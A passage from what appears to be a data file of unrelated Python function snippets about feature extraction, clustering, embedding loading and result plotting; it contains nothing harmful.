'/':\n output_folder += '/'\n\n svm_file = output_folder + 'svm.txt'\n centroid_file = output_folder + 'centroids.txt'\n ids_file = output_folder + 'ids.txt'\n\n surf = cv2.SURF(250, extended=False)\n categories = dict()\n ids = dict()\n id = 1\n features = list()\n\n print \"Extracting features\"\n for line in open(training_file):\n try:\n category, path = line.split(';')\n except:\n print \"Error: File not in proper format. 
Ensure: <category/class name>; <path to image of said category>\"\n sys.exit(0)\n path = path.strip()\n\n try:\n img = cv2.imread(path)\n #img = cv2.resize(img, (500, 500))\n except Exception as e:\n print e\n continue\n\n keypoints, descriptors = surf.detectAndCompute(img, None)\n\n if not category in categories:\n categories[category] = Category(label=category)\n ids[category] = id\n id += 1\n categories[category].add_feature(descriptors)\n\n #for category in categories:\n #f = categories[category].yield_features()\n ##features.extend(f)\n #for i in f:\n #features.extend(i)\n\n print \"Calculating centroids\"\n #np_features = numpy.array(features)\n #print \"Features: \", np_features.shape\n #centroids, labels = kmeans2(np_features, FEATURE_TYPES)\n centroids = helpers.loadObject(output_folder + 'centroids.txt')\n print centroids.shape\n\n print \"Forming bag of words\"\n X, Y = [], []\n for category in categories:\n categories[category].calc_bagofwords(centroids)\n for bow in categories[category].bagofwords:\n X.append(bow)\n Y.append(ids[category])\n print \"Fitting linear SVMs onto the bag of words\"\n lin_clf = svm.LinearSVC()\n lin_clf.fit(X, Y)\n\n helpers.saveObject(lin_clf, svm_file)\n helpers.saveObject(centroids, centroid_file)\n helpers.saveObject(ids, ids_file)", "def print_cluster_attributes(self, objects):\n print(\"\\n\")\n print((\"ClusterName\".ljust(35),\":\",objects.ClusterName.value()))\n print((\"Repository Disk\".ljust(35),\":\", \\\n objects.RepositoryDisk.PhysicalVolume[0].VolumeName.value()))\n print(\"\\nNodes in the cluster :\\n-----------------------\")\n for Node in objects.Node.Node :\n print((\"HostName\".ljust(35),\":\",\\\n Node.HostName.value()))\n print((\"PartitionID\".ljust(35),\":\", \\\n Node.PartitionID.value()))\n print()", "def get_label_vectors():\n print(\"Retrieving label vectors...\")\n label_dict = {} # instantiate dict for labels:vectors\n categories = sorted([c for c in os.listdir('images/') if c[0] != '.']) # ignore hidden files\n x = np.zeros(len(categories)) # zero vector of number of categories\n for i, c in enumerate(categories): # get index and category for images\n y = x.copy() # use copy of x\n y[i] = 1 # set label index to true\n label_dict[c] = y.copy() # create label:vector\n\n return label_dict", "def cluster_text(list_of_text):\n print(\"Clustering text info saved the clustering.txt\")\n vectorizer = TfidfVectorizer(stop_words=\"english\")\n transform = vectorizer.fit_transform(list_of_text)\n\n true_k = 70\n\n model = MiniBatchKMeans(n_clusters=true_k, init=\"k-means++\", max_iter=100, n_init=1)\n model.fit(transform)\n clusters = {}\n for i in model.labels_:\n if not i in clusters:\n clusters[i] = 1\n else:\n clusters[i] += 1\n\n order_centroids = model.cluster_centers_.argsort()[:, ::-1]\n terms = vectorizer.get_feature_names()\n with open(\"clustering.txt\", \"w+\") as f:\n f.write(\"Top terms per cluster:\\n\")\n for i in range(true_k):\n with open(\"clustering.txt\", \"a\") as f:\n f.write(f\"Cluster {i}\\n\")\n f.write(f\"Number of tweets in this cluster: {clusters[i]}\\n\")\n term_list = []\n for ind in order_centroids[i, :10]:\n with open(\"clustering.txt\", \"a\") as f:\n f.write(terms[ind] + \"\\n\")\n term_list.append(terms[ind] + \"\\n\")\n return model.labels_", "def load_glove_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n for i,line in enumerate(f):\n L = line.split()\n word = L[0].lower()\n if word in vocab:\n word_vecs[word] = np.array(L[1:], dtype='float32')\n return word_vecs", "def 
clusters(self, *args, **kwargs):\n\n result, name = is_file(kwargs.get('value')[0])\n if result:\n jdata = load_file(name)\n dump = False\n else:\n url = self.base.format('file/clusters')\n if by_id:\n self.params['query'] = 'cluster:{0}'.format(kwargs.get('value')[0])\n else:\n self.params['date'] = name\n jdata, response = get_response(url, apikey=self.apikey, params=self.params)\n\n if kwargs.get('return_raw'):\n return jdata\n\n if _check_error(jdata):\n return\n\n simple_list = (\n 'size_top200',\n 'num_clusters',\n )\n\n self.simple_print(jdata, simple_list, indent='\\n\\t')\n for key in simple_list:\n if jdata.get(key):\n self.print_key(key, indent='\\n\\t')\n print('\\n\\t', jdata.get(key))\n\n if jdata.get('clusters'):\n plist = [[]]\n for line in jdata['clusters']:\n plist.append(\n [line['label'], line['avg_positives'], line['id'], line['size']])\n\n pretty_print_special(\n plist,\n ['Label', 'AV Detections', 'Id', 'Size'],\n [40, 15, 80, 8],\n ['l', 'c', 'l', 'c'],\n kwargs.get('email_template')\n )\n\n if dump:\n jsondump(jdata, 'clusters_{0}'.format(name))", "def read_features_from_file(filename):\n\tf = np.loadtxt(filename)\n\treturn f[:,:4],f[:,4:] # feature locations, descriptors", "def load_features_labels(self):\n MFCCs = torch.from_numpy(np.load(self.feature_file))\n labels = torch.from_numpy(np.load(self.label_file))\n 'Loading from files finished!'\n return MFCCs.view(-1,1,128,128), labels.long()", "def main():\n arguments = docopt(__doc__, version='cluster_parameter_extractor 1.0 BETA')\n\n input_file = arguments['--input']\n output_file = arguments[\"--output\"]\n process_synthetic = arguments[\"--synthetic_peptides\"]\n\n # make sure the input file exists\n if not os.path.isfile(input_file):\n print(\"Error: Cannot find input file '\" + input_file + \"'\")\n sys.exit(1)\n\n # make sure the output file does not exist\n if os.path.isfile(output_file):\n print(\"Error: Output file exists '\" + output_file + \"'\")\n sys.exit(1)\n\n with open(output_file, \"w\") as OUT:\n # write the header\n OUT.write(\"id\\tprecursor_mz\\tav_charge\\tsize\\tidentified_spec_count\\tunidentified_spec_count\\t\"\n \"max_ratio\\tmax_il_ratio\\tprecursor_mz_range\\tsequences\\t\"\n \"max_sequence\\tmax_sequence_count\\tmax_sequence_mods\\t\"\n \"second_max_sequence\\tsecond_max_sequence_count\\tsecond_max_sequence_mods\\tn_input_files\\t\"\n \"max_consensus_peak_rel_tic\\tmax_consensus_peak_mz\")\n\n if process_synthetic:\n OUT.write(\"\\tsynth_count\\tsynth_ratio\\tsynth_max_sequence\")\n\n OUT.write(\"\\n\")\n\n # process the file\n parser = clustering_parser.ClusteringParser(input_file)\n\n for cluster in parser:\n cluster_line = process_cluster(cluster)\n OUT.write(cluster_line)\n\n # process synthetic peptides\n if process_synthetic:\n synth_line = process_synthetic_peptides(cluster)\n OUT.write(\"\\t\" + synth_line)\n\n OUT.write(\"\\n\")\n\n print(\"Results written to \" + output_file)", "def parse_tab_file_get_clusters(filename1,\r\n seq_db):\r\n cluster_file = open(filename1, \"r\")\r\n # dictionaries for keeping the counts\r\n member_in_cluster_to_count_dict = dict()\r\n species_in_cluster_count_dict = dict()\r\n names, names_abudance_removed = get_names_from_Seq_db(seq_db)\r\n\r\n # a way of keeping track of the iteration\r\n interation_count = int(0)\r\n # iterate through the file\r\n for line in cluster_file:\r\n interation_count += 1\r\n # call the func to split up the line\r\n cluster_line_split = parse_line(line.rstrip())\r\n if not cluster_line_split:\r\n # this could be 
a blank line or starts with #\r\n continue\r\n # call the function to get the number of\r\n # elements and species.\r\n members_count, \\\r\n species_count = count_element_in_cluster(cluster_line_split,\r\n names,\r\n names_abudance_removed)\r\n try:\r\n # if we have seen this count before,\r\n # then just add one to it.\r\n member_in_cluster_to_count_dict[members_count] += 1\r\n except KeyError:\r\n # not seen this before, set up a new dic element\r\n # and make the equal 1\r\n member_in_cluster_to_count_dict[members_count] = 1\r\n try:\r\n # if we have seen this count of species before,\r\n # then just add one to it.\r\n species_in_cluster_count_dict[species_count] += 1\r\n except KeyError:\r\n species_in_cluster_count_dict[species_count] = 1\r\n species_in_cluster_list, species_number_of_keys, species_max_val, \\\r\n species_vals_for_bar_chart = covert_dict_to_list_of_value(\r\n species_in_cluster_count_dict)\r\n\r\n # print (\"member_in_cluster_to_count_dict: \",\r\n # member_in_cluster_to_count_dict)\r\n member_in_cluster_list, member_number_of_keys, member_max_val, \\\r\n member_vals_for_bar_chart = covert_dict_to_list_of_value(\r\n member_in_cluster_to_count_dict)\r\n # plot_multi_bar_chart_graph\r\n plot_multi_bar_chart_graph(\"Barchart: database species clusters\",\r\n species_vals_for_bar_chart,\r\n \"Barchart: total members in all cluster\",\r\n member_vals_for_bar_chart,\r\n \"Barchart: cluster size\",\r\n member_vals_for_bar_chart,\r\n filename1)", "def extract_feature_vectors(file, dict):\n f = open(file, 'r')\n num_lines = 0\n\n for line in f:\n if(line.strip()):\n num_lines = num_lines + 1\n\n f.close()\n\n feature_matrix = np.zeros([num_lines, len(dict)])\n\n f = open(file, 'r')\n pos = 0\n\n for line in f:\n if(line.strip()):\n flist = extract_words(line)\n for word in flist:\n if(word in dict):\n feature_matrix[pos, dict.index(word)] = 1\n pos = pos + 1\n\n f.close()\n\n return feature_matrix", "def load_model(self, file=FILENAME, dim=DIMENSION, normalize=False):\n print(\"Loading pretrained Glove vectors from file {}\".format(FILENAME))\n self.dimension = dim\n self.normalize = normalize\n with open(file, \"r\", encoding=\"utf-8\") as textfile:\n self.num_tokens = count_lines(textfile)\n self.tokens_arr = [\"\" for i in range(self.num_tokens)]\n self.embeddings_mat = np.zeros((self.num_tokens, self.dimension))\n\n for idx, line in enumerate(textfile):\n line = line.split()\n token = ''.join(line[:-self.dimension])\n self.tokens_arr[idx] = token\n self.token_to_idx[token] = idx \n vec = list(map(float, line[-self.dimension:]))\n if self.normalize: \n # normalize the vectors as they are put into the matrix\n vec = vec / np.linalg.norm(vec)\n self.embeddings_mat[idx] = vec \n if (idx+1) % 200000 == 0:\n print(\" --{}% loaded.\".format(round(idx/self.num_tokens*100, 2)))\n print(\"Finished loading Glove model. 
{} vectors loaded\".format(self.num_tokens))", "def cluster_features(self):\n logger.info('Creating term-document matrix...')\n self._create_tdm()\n init_centroids = self.centroids_from_categories()\n\n # Cluster the features using specific centroids.\n logger.info('Clustering features...')\n self.kmeans = KMeans(init=init_centroids, n_init=1, max_iter=1, n_clusters=len(self.feature_categories))\n self.clusters = self.kmeans.fit_predict(self.tdm)\n\n # The feature vector maps key features (categories) to other features that occur in the same cluster.\n logger.info('Converting clusters to feature vectors...')\n feature_vectors = self.clusters_to_feature_vectors(category_features=list(self.feature_amenity_map.keys()))\n\n return feature_vectors", "def read_labelmap_vidor(labelmap_file):\n\n labelmap = []\n class_ids = set()\n name = \"\"\n class_id = \"\"\n\n with open('idx_to_pred.pkl', 'rb') as f:\n idx_to_pred = pickle.load(f)\n\n # with PathManager.open(labelmap_file, \"r\") as f:\n # import pdb; pdb.set_trace()\n # for line in f:\n # if line.startswith(\" name:\"):\n # name = line.split('\"')[1]\n # elif line.startswith(\" id:\") or line.startswith(\" label_id:\"):\n # class_id = int(line.strip().split(\" \")[-1])\n # labelmap.append({\"id\": class_id, \"name\": name})\n # class_ids.add(class_id)\n # return labelmap, class_ids\n\n \"\"\"\n (Pdb) categories\n [{'id': 1, 'name': 'bend/bow (at the waist)'}, {'id': 3, 'name': 'crouch/kneel'}, {'id': 4, 'name': 'dance'}, {'id': 5, 'name': 'fall down'}, {'id': 6, 'name': 'get up'}, {'id': 7, 'name': 'jump/leap'}, {'id': 8, 'name': 'lie/sleep'}, {'id': 9, 'name': 'martial art'}, {'id': 10, 'name': 'run/jog'}, {'id': 11, 'name': 'sit'}, {'id': 12, 'name': 'stand'}, {'id': 13, 'name': 'swim'}, {'id': 14, 'name': 'walk'}, {'id': 15, 'name': 'answer phone'}, {'id': 17, 'name': 'carry/hold (an object)'}, {'id': 20, 'name': 'climb (e.g., a mountain)'}, {'id': 22, 'name': 'close (e.g., a door, a box)'}, {'id': 24, 'name': 'cut'}, {'id': 26, 'name': 'dress/put on clothing'}, {'id': 27, 'name': 'drink'}, {'id': 28, 'name': 'drive (e.g., a car, a truck)'}, {'id': 29, 'name': 'eat'}, {'id': 30, 'name': 'enter'}, {'id': 34, 'name': 'hit (an object)'}, {'id': 36, 'name': 'lift/pick up'}, {'id': 37, 'name': 'listen (e.g., to music)'}, {'id': 38, 'name': 'open (e.g., a window, a car door)'}, {'id': 41, 'name': 'play musical instrument'}, {'id': 43, 'name': 'point to (an object)'}, {'id': 45, 'name': 'pull (an object)'}, {'id': 46, 'name': 'push (an object)'}, {'id': 47, 'name': 'put down'}, {'id': 48, 'name': 'read'}, {'id': 49, 'name': 'ride (e.g., a bike, a car, a horse)'}, {'id': 51, 'name': 'sail boat'}, {'id': 52, 'name': 'shoot'}, {'id': 54, 'name': 'smoke'}, {'id': 56, 'name': 'take a photo'}, {'id': 57, 'name': 'text on/look at a cellphone'}, {'id': 58, 'name': 'throw'}, {'id': 59, 'name': 'touch (an object)'}, {'id': 60, 'name': 'turn (e.g., a screwdriver)'}, {'id': 61, 'name': 'watch (e.g., TV)'}, {'id': 62, 'name': 'work on a computer'}, {'id': 63, 'name': 'write'}, {'id': 64, 'name': 'fight/hit (a person)'}, {'id': 65, 'name': 'give/serve (an object) to (a person)'}, {'id': 66, 'name': 'grab (a person)'}, {'id': 67, 'name': 'hand clap'}, {'id': 68, 'name': 'hand shake'}, {'id': 69, 'name': 'hand wave'}, {'id': 70, 'name': 'hug (a person)'}, {'id': 72, 'name': 'kiss (a person)'}, {'id': 73, 'name': 'lift (a person)'}, {'id': 74, 'name': 'listen to (a person)'}, {'id': 76, 'name': 'push (another person)'}, {'id': 77, 'name': 'sing to (e.g., self, a 
person, a group)'}, {'id': 78, 'name': 'take (an object) from (a person)'}, {'id': 79, 'name': 'talk to (e.g., self, a person, a group)'}, {'id': 80, 'name': 'watch (a person)'}]\n (Pdb) class_whitelist\n {1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 17, 20, 22, 24, 26, 27, 28, 29, 30, 34, 36, 37, 38, 41, 43, 45, 46, 47, 48, 49, 51, 52, 54, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 72, 73, 74, 76, 77, 78, 79, 80}\n \"\"\"", "def _load_glove_vec(fname, vocab):\n print 'load glove...'\n word_vecs = {}\n cnt = 0\n l = open(fname,'r').readline()\n embedding_size = len(l.strip().split()) -1\n print 'embedding vector size: %d'%(embedding_size)\n with open(fname, \"r\") as f:\n for l in f:\n stemp = l.strip().split(' ',1)\n assert len(stemp) == 2\n word = stemp[0]\n if word in vocab:\n word_vecs[stemp[0]] = np.fromstring(' '.join(stemp[1:]),sep = ' ')\n cnt+=1\n if cnt%10000==0:\n print '%d lines...'%cnt\n return (word_vecs,embedding_size)", "def load_vector_dictionary():\n return read_word2vecs_from_file(VECTOR_FILE)", "def create_mallet_clusters(filename, num_clusters, vocab):\n # Words that appear in the MALLET clusters\n cluster_words = []\n # Clusters - each cluster is a list with entries in format (word, counts)\n clusters_with_counts = [None] * num_clusters\n\n with open(filename, 'r') as f:\n lines = f.readlines()\n\n for line in lines:\n tokens = line.strip().split()\n # Extract word and highest count from MALLET file\n # Highest count has form i:j where i is the cluster id\n # and j is the number of counts\n word, highest_count = tokens[1:3]\n if word in vocab:\n cluster_words.append(word)\n cluster_idx, count = [int(s) for s in highest_count.split(':')]\n if clusters_with_counts[cluster_idx] is None:\n clusters_with_counts[cluster_idx] = [(word, count)]\n else:\n clusters_with_counts[cluster_idx].append((word, count))\n\n for c in clusters_with_counts:\n c.sort(key=lambda x: x[1], reverse=True)\n\n # Clusters with words only (sorted in descending count order)\n clusters_words_only = []\n for c in clusters_with_counts:\n clusters_words_only.append([x[0] for x in c])\n\n return clusters_words_only, clusters_counts, cluster_words", "def writeClusterLabels(self, outfile, multiout=False):\n if multiout:\n print \"Writing classification to multiple output files, one class per file ...\"\n # Write classified points to different files, one file for one class for\n # easy display in CloudCompare\n fileprefix = \".\".join(outfile.split(\".\")[0:-1])\n cl_max = np.max(self.labels)\n namefmtstr = \"_{0:0>\"+str(len(str(cl_max)))+\"d}.txt\"\n ulabels, label_inv = np.unique(self.labels, return_inverse=True)\n outfobjs = [open(fileprefix+namefmtstr.format(cl), 'w') for cl in ulabels]\n\n headerstr = \"\"\n npts = len(self.labels)\n with open(self.inptsfile, 'r') as infobj:\n headerstr += infobj.readline().rstrip('\\n')+\"[Clustering by {0:s}]\\n\".format(self.classifier)\n infobj.readline()\n headerstr += \"Run made at: \"+time.strftime(\"%c\")+\"\\n\"\n headerstr += infobj.readline().rstrip('\\n')+\",ndi,ndi0,clabel\\n\"\n\n junk = [ fobj.write(headerstr) for fobj in outfobjs ]\n\n for n, (si, si0, label) in enumerate(itertools.izip(self.ndi, self.ndi0, self.labels)):\n outfobjs[label_inv[n]].write(infobj.readline().rstrip('\\n')+\",{0:.3f},{1:.3f},{2:d}\\n\".format(si, si0, label))\n if self.verbose and (n % 1000 == 0):\n sys.stdout.write(\"Writing points {0:d} % \\r\".format((n*100)/npts))\n\n junk = [ fobj.close() for fobj in outfobjs ]\n else:\n # Write all classified points 
to a single file\n print \"Writing classification to one output file ...\"\n npts = len(self.labels)\n headerstr = \"\"\n with open(self.inptsfile, 'r') as infobj, open(outfile, 'w') as outfobj:\n headerstr += infobj.readline().rstrip('\\n')+\"[Clustering by {0:s}]\\n\".format(self.classifier)\n infobj.readline()\n headerstr += \"Run made at: \"+time.strftime(\"%c\")+\"\\n\"\n headerstr += infobj.readline().rstrip('\\n')+\",ndi,ndi0,clabel\\n\"\n outfobj.write(headerstr)\n\n # outfobj.write(infobj.readline().rstrip('\\n')+\"[Clustering by KMeans]\\n\")\n # infobj.readline()\n # outfobj.write(\"Run made at: \"+time.strftime(\"%c\")+\"\\n\")\n # outfobj.write(infobj.readline().rstrip('\\n')+\",clabel\\n\")\n\n for n, (si,si0, label) in enumerate(itertools.izip(self.ndi, self.ndi0, self.labels)):\n outfobj.write(infobj.readline().rstrip('\\n')+\",{0:.3f},{1:.3f},{2:d}\\n\".format(si, si0, label))\n if self.verbose and (n % 1000 == 0):\n sys.stdout.write(\"Writing points {0:d} % \\r\".format((n*100)/npts))", "def load_embeddings(embeddings_path):\n\n embeddings_index = {}\n f = open(embeddings_path, encoding='utf-8')\n for line in tqdm(f):\n values = line.rstrip().split(' ')\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n f.close()\n print('Found {} word vectors.'.format(len(embeddings_index)))\n return embeddings_index", "def loadGLOVE(filename, vocab):\n dct = {}\n vectors = array.array('d')\n current_idx = 0\n with codecs.open(filename, \"r\", encoding=\"utf-8\") as f:\n for _, line in enumerate(f):\n tokens = line.split(\" \")\n word = tokens[0]\n entries = tokens[1:]\n if not vocab or word in vocab:\n dct[word] = current_idx\n vectors.extend(float(x) for x in entries)\n current_idx += 1\n word_dim = len(entries)\n num_vectors = len(dct)\n tf.logging.info(\"Found {} out of {} vectors in Glove\".format(num_vectors, len(vocab)))\n return [np.array(vectors).reshape(num_vectors, word_dim), dct]", "def assignLabels(self):\n clusters = np.arange(0, len(self.V))[self.V < self.V1] #indexes self.V, volumes_sorted, and oldOrder\n self.clusterV = self.volumes_sorted[clusters]\n clusters = self.oldOrder[clusters] #indexes volumes\n self.clusters = self.nonBI[clusters] #indexes self.vor and self.data\n self.easyLabel = np.zeros(len(self.data))\n self.easyLabel[self.clusters] = 1\n print('Out of ' + str(len(self.data)) + ' particles, ' + str(len(self.clusters)) + ' (' + str(round(len(self.clusters)*100/len(self.data), 3)) +' %) are labelled as cluster particles.')", "def cluster_classify(bounding_boxes):\n features = []\n for box_index in range(bounding_boxes.shape[0]):\n area, ratio = ratio_area_calculate(bounding_boxes[box_index])\n features.append([area, ratio])\n\n features_a = np.asarray(features, dtype=np.float32)\n print(features_a.shape)\n\n criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 10, 1.0)\n ret, label, center = cv.kmeans(features_a, 4, None, criteria, 10, cv.KMEANS_RANDOM_CENTERS)\n center_list = []\n for ctr in range(center.shape[0]):\n center_list.append(center[ctr, 0])\n sort_list = center_list.copy()\n sort_list.sort()\n index_list = []\n for element in sort_list:\n index_list.append(center_list.index(element))\n\n small = features_a[label.ravel() == index_list[0]]\n middle = features_a[label.ravel() == index_list[1]]\n large = features_a[label.ravel() == index_list[2]]\n poly = features_a[label.ravel() == index_list[3]]\n\n plt.scatter(small[:, 0], small[:, 1])\n plt.scatter(middle[:, 0], middle[:, 1], c='r', 
marker='s')\n plt.scatter(large[:, 0], large[:, 1], c='g', marker='d')\n plt.scatter(poly[:, 0], poly[:, 1], c='b', marker='^')\n plt.legend(['small bubble', 'middle bubble', 'large bubble', 'poly bubble'])\n plt.xlabel('area')\n plt.ylabel('aspect ratio')\n\n plt.show()\n\n return", "def info(file, extended, vlrs, points):\n try:\n with pylas.open(openbin_file(file)) as fp:\n echo_header(fp.header, extended)\n\n if vlrs:\n click.echo(20 * \"-\")\n echo_vlrs(fp)\n\n if points:\n click.echo(20 * \"-\")\n echo_points(fp)\n except fs.errors.ResourceNotFound as e:\n click.echo(click.style(\"Error: {}\".format(e), fg=\"red\"))", "def load_vectors(fname):\r\n # taken from: https://fasttext.cc/docs/en/english-vectors.html\r\n vectors_data = vocab.Vectors(name=fname)\r\n\r\n return vectors_data", "def feature_vecs_NLP(train_pos, train_neg, test_pos, test_neg):\n # English stopwords from nltk\n stopwords = set(nltk.corpus.stopwords.words('english'))\n \n # Determine a list of words that will be used as features. \n # This list should have the following properties:\n # (1) Contains no stop words\n # (2) Is in at least 1% of the positive texts or 1% of the negative texts\n # (3) Is in at least twice as many postive texts as negative texts, or vice-versa.\n # YOUR CODE HERE\n\n pos_unique_words = []\n neg_unique_words = []\n intermediate_vec = []\n feature_vec = []\n\n for line in train_pos:\n line = list(set(line))\n for word in line:\n if word not in stopwords:\n pos_unique_words.append(word)\n\n for line in train_neg:\n line = list(set(line))\n for word in line:\n if word not in stopwords:\n neg_unique_words.append(word)\n\n\n pos_word_dict = collections.Counter(pos_unique_words)\n neg_word_dict = collections.Counter(neg_unique_words)\n\n unique_words = list(set(pos_word_dict.keys()).intersection(set(neg_word_dict.keys())))\n\n for word in unique_words:\n if(pos_word_dict[word] >= 0.01*len(train_pos) or neg_word_dict[word] >= 0.01*len(train_neg)):\n intermediate_vec.append(word)\n\n for word in intermediate_vec:\n if (int(pos_word_dict[word]) >= 2*int(neg_word_dict[word])or neg_word_dict[word] >= 2*pos_word_dict[word]):\n feature_vec.append(word)\n\n train_pos_vec = []\n train_neg_vec = []\n test_pos_vec = []\n test_neg_vec = []\n # Using the above words as features, construct binary vectors for each text in the training and test set.\n # These should be python lists containing 0 and 1 integers.\n # YOUR CODE HERE\n for line in train_pos:\n lst = []\n for word in feature_vec:\n if word in line:\n lst.append(1)\n else:\n lst.append(0)\n train_pos_vec.append(lst)\n\n for line in train_neg:\n lst = []\n for word in feature_vec:\n if word in line:\n lst.append(1)\n else:\n lst.append(0)\n train_neg_vec.append(lst)\n\n for line in test_pos:\n lst = []\n for word in feature_vec:\n if word in line:\n lst.append(1)\n else:\n lst.append(0)\n test_pos_vec.append(lst)\n\n for line in test_neg:\n lst = []\n for word in feature_vec:\n if word in line:\n lst.append(1)\n else:\n lst.append(0)\n test_neg_vec.append(lst)\n\n # Return the four feature vectors\n return train_pos_vec, train_neg_vec, test_pos_vec, test_neg_vec", "def read_traindata (filename, labels = ['pos', 'neg']):\n def split (l):\n \"\"\"split one line into words and label\"\"\"\n segs = l.strip().split ('\\t')\n label = segs [-1]\n words = segs [:-1]\n return words, label\n \n encoding = chardet.detect(open (filename).read ()) ['encoding']\n \n with codecs.open (filename, 'r', encoding) as f:\n for line in f.readlines ():\n row = split (line)\n 
assert len (row) == 2\n assert isinstance(row [0], list)\n assert isinstance(row [1], basestring)\n print row [1]\n assert row [1] in labels\n yield row", "def demo():\n # declare dummy input vector with two dimensions:\n vectors = numpy.array([[2,4], [0,1], [1,1], [3,2], [4,0], [2,2], [8, 9], [8, 11]])\n\n # compute the distance matrix on the basis of the vectors via sklearn:\n dist_matrix = pairwise_distances(vectors, metric='cityblock')\n\n # plot the distance matrix:\n # dist_matrix.draw() this doesn't work anymore\n\n # initialize a temporal VNC clusterer, here with the Ward linkage method:\n clusterer = VNClusterer(dist_matrix, linkage='ward') # could also be a plain Clusterer()\n\n # start the clustering procedure:\n clusterer.cluster(verbose=1)\n\n labels = ['n'+str(i+1) for i in range(len(vectors))]\n # plot the result as a dendrogram\n clusterer.dendrogram.draw(save=True,\n labels=labels,\n title=\"VNC Analysis (Ward's Linkage)\")", "def updateClusterInfo(self):\n self.nPoints = len(self.labels)\n self.n = len(np.unique(self.labels))\n self.centers = [ [0.0 for j in range(3)] for i in range(self.n)]", "def cluster_data(data_loc, num_clusters, base_destination, vectorizer):\n cluster_df = __title_cluster_df(data_loc, num_clusters, vectorizer)\n if not os.path.isdir(base_destination):\n os.mkdir(base_destination)\n vec_path = os.path.join(base_destination, 'vectorizer.pkl')\n with open(vec_path, 'wb') as f:\n pickle.dump(vectorizer, f)\n cluster_stats = {}\n for i in range(num_clusters):\n titles = cluster_df[cluster_df['cluster']==i]['title']\n cluster_stats[i] = titles.shape[0]\n cluster_data = __get_data_with_titles(data_loc, titles)\n dest = os.path.join(base_destination, 'cluster_{}.json'.format(i))\n with open(dest, 'w') as f:\n json.dump(cluster_data, f)\n stats_path = os.path.join(base_destination, 'cluster_statistics.txt')\n with open(stats_path, 'w') as f:\n for cluster in cluster_stats.keys():\n f.write('cluster {}: '.format(cluster))\n f.write(str(cluster_stats[cluster]) + '\\n')", "def convert2libsvm(f_vec):\n line = ''\n \n label = int(f_vec[0])\n \n # if you specified a positive label ID in your data for one-versus-all\n if not (args.ova == None):\n line += '1' if (str(label-1) == str(args.ova)) else '0'\n else:\n line += str(label)\n \n # skip zero entries\n for feat_idx in xrange(2,f_vec.size+1):\n value = f_vec[feat_idx-1]\n if args.sparse == 1 and value == 0:\n continue\n else:\n line += (' ' + str(feat_idx-1) + ':' + str(f_vec[feat_idx-1]))\n \n return line", "def plotClusters(self):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n fig.set_size_inches(18.5, 9.5)\n ax.set_title('Identification of Cluster Particles with Voronoi Volumes', fontsize=22)\n ax.set_xlabel('x [m]', fontsize=18)\n ax.set_ylabel('y [m]', fontsize=18)\n ax.set_zlabel('z [m]', fontsize=18)\n\n strength = np.linspace(0, 0.8, len(self.unique_labels))\n np.random.shuffle(strength)\n colors = [plt.cm.nipy_spectral(each) for each in strength]\n np.random.shuffle(strength)\n colorsB = [plt.cm.nipy_spectral(each) for each in strength]\n\n for k, col, colB in zip(self.unique_labels, colors, colorsB):\n a = 1\n s = 3\n if k == -1:\n # Black used for noise.\n col = [1, 0, 0]\n a = 0.3\n s = 1\n\n class_member_mask = (self.labels == k)\n xy = self.data[class_member_mask]\n if len(xy) > 0:\n ax.scatter(xy[:, 0], xy[:, 1], xy[:, 2], c=np.reshape(np.array(col), (1, -1)),\n edgecolors=np.reshape(np.array(colB), (1, -1)), alpha=a, s=s, label='Cluster ' + str(k))", "def readin():\r\n nodes 
= np.loadtxt('Vnodes.txt', ndmin=2)\r\n mats = np.loadtxt('Vmater.txt', ndmin=2)\r\n elements = np.loadtxt('Veles.txt', ndmin=2)\r\n loads = np.loadtxt('Vloads.txt', ndmin=2)\r\n return nodes, mats, elements, loads", "def svm_read_feature(data_file_name, digit):\n\tprob_y = []\n\tprob_x = []\n\tfor line in open(data_file_name):\n\t\t#print line\n\t\tline = line.split(None, 1)\n\t\t#print line\n\t\t# In case an instance with all zero features\n\t\tif len(line) == 1: line += ['']\n\t\tlabel, features = line\n\t\t#parse prob_x\n\t\txi = {}\n\t\tind = 1\n\t\tfor e in features.split():\n\t\t\txi[ind] = float(e)\n\t\t\tind += 1\n\t\t#parse prob_y\n\t\tif int(float(label)) == digit:\n\t\t\tprob_y += [float(+1)]\n\t\telse:\n\t\t\tprob_y += [float(-1)]\n\t\tprob_x += [xi]\n\treturn (prob_y, prob_x)", "def test_file(self, file_name, version, classifier_type):\n labels = []\n with open(file_name) as f:\n for line in f.readlines():\n print(line,self.predict(line))\n labels.append(self.predict(line))\n \n filename = 'test_results-' + classifier_type + '-' + version + '.txt'\n \n with open(filename, 'w') as f:\n for label in labels:\n f.write(str(label)+\"\\n\")\n \n print (\"Results from \",file_name,\" printed to:\",filename)", "def main():\n\tif(len(sys.argv) < 6) :\n\t\tprint('Usage : python node_representation.py graphfile node2vec_file text_file word2vec_size, size_walk')\n\t\texit()\n\n\tgraph, node2vec_file, text_file, size_w2v, size_walk = sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4]), int(sys.argv[5])\t\n\t#loads graph, word2vec corpora and node2vec model\n\tfile = open(graph, 'rb')\n\tG = pickle.load(file) \n\tfile.close()\n\tnode2vec = load_node2vec(node2vec_file)\n\tdf_user_text, text, w2v_model = load_text(text_file, size_w2v)\n\n\tG = G.to_directed()\n\tG = nx.convert_node_labels_to_integers(G)\n\n\tnodes = list(G.nodes)\n\tgraph_data = {}\n\n\tprint('# iterating... 
